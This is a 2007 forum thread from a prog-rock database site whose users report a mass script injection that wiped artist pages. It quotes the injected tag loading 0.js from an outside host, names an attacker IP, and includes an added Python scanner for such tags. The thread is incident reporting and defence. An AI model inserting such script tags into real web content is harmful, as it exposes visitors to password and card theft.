
Anathema: Left overs from the recent hack

Printed From: Progarchives.com
Category: Site News, Newbies, Help and Improvements
Forum Name: Report errors & omissions here
Forum Description: Seen a mistake in a band bio etc then please tell us
URL: http://www.progarchives.com/forum/forum_posts.asp?TID=44850
Printed Date: November 22 2024 at 05:42
Software Version: Web Wiz Forums 11.01 - http://www.webwizforums.com


Topic: Anathema: Left overs from the recent hack
Posted By: Angelo
Subject: Anathema: Left overs from the recent hack
Date Posted: December 28 2007 at 08:11

I found this in Report Bugs here:
http://www.progarchives.com/forum/forum_posts.asp?TID=44668

Probably also other bios are affected...




-------------
ISKC Rock Radio - http://www.iskcrocks.com
I stopped blogging and reviewing - so won't be handling requests. Promos for airplay can be sent to [email protected]



Replies:
Posted By: Angelo
Date Posted: December 28 2007 at 10:35
Van der Graaf Generator bio is also damaged and the picture gone....

-------------
ISKC Rock Radio - http://www.iskcrocks.com
I stopped blogging and reviewing - so won't be handling requests. Promos for airplay can be sent to [email protected]


Posted By: Atkingani
Date Posted: December 28 2007 at 10:50
I'm afraid the problem could be worse...
Check the ULVER page:
  http://www.progarchives.com/artist.asp?id=2089


-------------
Guigo

~~~~~~


Posted By: Tuzvihar
Date Posted: December 28 2007 at 10:53
My post from the other thread:
Originally posted by Tuzvihar:

There is also lacking a picture for this album (../album.asp?id=17417).

I couldn't find it...


-------------
"Music is much like f**king, but some composers can't climax and others climax too often, leaving themselves and the listener jaded and spent."

Charles Bukowski


Posted By: Atkingani
Date Posted: December 28 2007 at 10:54
I checked randomly BACAMARTE page and there's a problem there too... and I cannot access properly the entire database right now.
 
Are we under attack?


-------------
Guigo

~~~~~~


Posted By: Easy Livin
Date Posted: December 28 2007 at 10:58
I think this must be a new bug. I've contacted M@x about it but it looks more prosaic.


Posted By: chamberry
Date Posted: December 28 2007 at 11:34
Just found out that John Zorn's band page looks weird too:
http://www.progarchives.com/artist.asp?id=2212



-------------



Posted By: Tuzvihar
Date Posted: December 28 2007 at 11:36
I randomly checked also Le Orme, Porcupine Tree, Vangelis... It looks like it affected every artist page.

-------------
"Music is much like f**king, but some composers can't climax and others climax too often, leaving themselves and the listener jaded and spent."

Charles Bukowski


Posted By: chamberry
Date Posted: December 28 2007 at 11:39
Also, the streamable MP3s are missing.



-------------



Posted By: Dean
Date Posted: December 28 2007 at 12:12
Yep, this is a new attack - even the main forum page is taking minutes to load.
 
If there is anything you want me to do just ask (not that the prospect of rebuilding the bio pages is cheering me up any).


-------------
What?


Posted By: Tuzvihar
Date Posted: December 28 2007 at 12:32
I went to the Admin Zone and took the option Update artists (it loads very slow!) - it seems all data is gone!!! All I could find there is: <script src=http://c.uc8010.com/0.js></script>.

-------------
"Music is much like f**king, but some composers can't climax and others climax too often, leaving themselves and the listener jaded and spent."

Charles Bukowski


Posted By: Angelo
Date Posted: December 28 2007 at 12:40
Is M@X aware? Could be useful to temporarily disconnect the server from the web (either physically or through software) to avoid more damage...



-------------
ISKC Rock Radio - http://www.iskcrocks.com
I stopped blogging and reviewing - so won't be handling requests. Promos for airplay can be sent to [email protected]


Posted By: Dim
Date Posted: December 28 2007 at 12:47
Damn, is there anything we can do?

-------------


Posted By: Angelo
Date Posted: December 28 2007 at 12:55
^Not a lot I expect.... I sent the contents of the script to Bob, so he can pass it on to M@X.

-------------
ISKC Rock Radio - http://www.iskcrocks.com
I stopped blogging and reviewing - so won't be handling requests. Promos for airplay can be sent to [email protected]


Posted By: Dean
Date Posted: December 28 2007 at 12:56
Run and hide.
 
This one is nasty. It originates from China and is designed to attach itself to your browser for stealing passwords and credit card numbers.


-------------
What?


Posted By: Angelo
Date Posted: December 28 2007 at 13:16
Where did you find that, Dean?

Thank god we have NoScript, and that on most pages it is inserted in the wrong place (it's being displayed as text rather than executed...)


-------------
ISKC Rock Radio - http://www.iskcrocks.com
I stopped blogging and reviewing - so won't be handling requests. Promos for airplay can be sent to [email protected]


Posted By: Dean
Date Posted: December 28 2007 at 13:40
My initial thoughts are confirmed - the Forum main page is also affected.
 
The 0.js script from c.uc8010.com is the same script that hit many websites back in November: http://www.websense.com/securitylabs/blog/blog.php?BlogID=160
 
If you see the c.uc8010.com/0.js script address on the page then it has not executed - the scary bit is when you don't see it, because it probably has executed, however apparently anti-virus software is catching it.
 
If you know how, then set your IP blocker to block address 61.188.39.218
 
If you are unprotected, then keep away from the PA until the problem is fixed.


-------------
What?
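
Added example, not part of the original thread or the site's own code: a scan of stored text columns for script tags that load from outside the site, telling a tag stored as raw markup apart from one stored entity-encoded (which a browser shows as text). The allowlist, the row layout and the function names are assumptions made for this example; the sample rows are constructed.

```python
import html
import re
from urllib.parse import urlparse

# Assumption for this example: the only host the site should load scripts from.
ALLOWED_HOSTS = {"www.progarchives.com"}

# Opening <script> tag with a quoted or unquoted src value; the tag quoted in
# the thread is unquoted: <script src=http://c.uc8010.com/0.js></script>
SCRIPT_SRC = re.compile(
    r"""<script\b[^>]*?\bsrc\s*=\s*(?:"([^"]*)"|'([^']*)'|([^\s>]+))""",
    re.IGNORECASE,
)

def external_script_hosts(text):
    """Hosts of script tags in text that are not on the allowlist."""
    hosts = []
    for m in SCRIPT_SRC.finditer(text):
        src = next(g for g in m.groups() if g is not None)
        host = urlparse(src.strip()).hostname  # None for relative (same-site) paths
        if host and host.lower() not in ALLOWED_HOSTS:
            hosts.append(host.lower())
    return hosts

def scan_rows(rows):
    """Return (row_id, column, host, state) for every suspicious tag.

    state 'raw': stored as markup, runs if the template emits the field as HTML.
    state 'escaped': stored entity-encoded, so browsers show it as text.
    """
    findings = []
    for row_id, columns in rows.items():
        for column, value in columns.items():
            for host in external_script_hosts(value):
                findings.append((row_id, column, host, "raw"))
            # Drop raw tags first so the unescaped pass reports only encoded ones.
            remainder = html.unescape(SCRIPT_SRC.sub("", value))
            for host in external_script_hosts(remainder):
                findings.append((row_id, column, host, "escaped"))
    return findings

# Constructed sample rows (hypothetical table layout: id -> text columns).
SAMPLE_ROWS = {
    1: {"name": "Band A", "bio": "Formed in 1990.<script src=http://c.uc8010.com/0.js></script>"},
    2: {"name": "Band B", "bio": "Clean text with <script src='/js/player.js'></script>"},
    3: {"name": "Band C&lt;script src=http://c.uc8010.com/0.js&gt;&lt;/script&gt;", "bio": "ok"},
}

if __name__ == "__main__":
    for finding in scan_rows(SAMPLE_ROWS):
        print(finding)
```

Rows flagged 'raw' are the ones to restore from backup first, since they are the ones a template can turn into a live script reference.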


Posted By: Magic Mountain
Date Posted: December 28 2007 at 14:49
I have gone to the forum main page and did not see "the c.uc8010.com/0.js script address on the page"  referred to above and my virus software did not catch it.  The main page did not load and had the message "Error on he Page" in the lower left-hand corner of the browser.  Does this mean the script has executed and all of my passwords and credit card information has been transmitted?  What is my next step?


Posted By: Angelo
Date Posted: December 28 2007 at 15:24
^ I'll send you a PM

The problem seems to have been resolved, in that the script references are removed and all artist content restored. M@X seems to have taken care of things.

In general: if this script does what it says on the pages Dean referred to, you should be fine if you run an up-to-date virus scanner on your computer. The script apparently tries to install software from the web that captures data like credit card number and passwords the moment they are typed in. Any good virus protection tool should catch those. People who don't have one installed I would advise to install and run one (Avast, http://WWW.AVAST.COM, is a good free solution that has protected me for 5 years now) before submitting online credit card orders or accessing online banking services.

Hope no big damage is done to anyone!


-------------
ISKC Rock Radio - http://www.iskcrocks.com
I stopped blogging and reviewing - so won't be handling requests. Promos for airplay can be sent to [email protected]


Posted By: Atkingani
Date Posted: December 28 2007 at 15:41
The main database is still off... maybe M@x is recovering it.

-------------
Guigo

~~~~~~


